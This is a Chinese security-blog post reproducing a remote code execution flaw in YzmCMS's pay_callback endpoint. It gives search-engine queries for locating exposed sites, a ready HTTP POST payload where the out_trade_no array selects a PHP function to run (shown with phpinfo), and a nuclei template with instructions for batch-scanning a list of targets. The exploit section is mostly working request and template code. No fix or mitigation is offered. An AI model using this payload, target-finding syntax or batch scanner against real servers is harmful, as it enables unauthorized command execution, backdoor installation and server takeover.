【漏洞复现 】YzmCMS pay_callback 任意命令执行

0x01 漏洞介绍

YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统,YzmCMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案。

YzmCMS /pay/index/pay_callback.html接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统指令,写入后门文件,最终可获取服务器权限。

0x02 搜索语法

Fofa:

app="yzmcms"


Hunter

app.name="YzmCMS"


Quake

app:"yzmcms"
【漏洞复现 | 让我看看是谁五一还在工作学习的】YzmCMS pay_callback 任意命令执行

0x03 漏洞复现

请求执行命令

POST /pay/index/pay_callback.html HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
 
out_trade_no[0]=eq&out_trade_no[1]=1&out_trade_no[2]=phpinfo

其中out_trade_no[1]是函数参数,out_trade_no[2]是调用的函数名。

图片[2]-【漏洞复现 】YzmCMS pay_callback 任意命令执行-XSS博客

0x04 nuclei POC

Nuclei 批量检测POC
所用方法nuclei.exe -l 网址文件.txt -t POC.yaml

id: YzmCMS_pay_callback_RCE

info:
  name: YzmCMS_pay_callback_RCE
  author: xiaoming
  severity: high
  description: YzmCMS pay_callback arbitrary command execution
  metadata:
    max-request: 1
    shodan-query: ""
    verified: true

http:
- raw:
  - |-
    @timeout: 30s
    POST /pay/index/pay_callback.html HTTP/1.1
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
    Accept-Encoding: gzip
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 60

    out_trade_no[0]=eq&out_trade_no[1]=1&out_trade_no[2]=phpinfo

  max-redirects: 3
  matchers-condition: and
  matchers:
  - type: word
    part: body
    words:
    - php.ini
    condition: and
图片[3]-【漏洞复现 】YzmCMS pay_callback 任意命令执行-XSS博客
© 版权声明
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容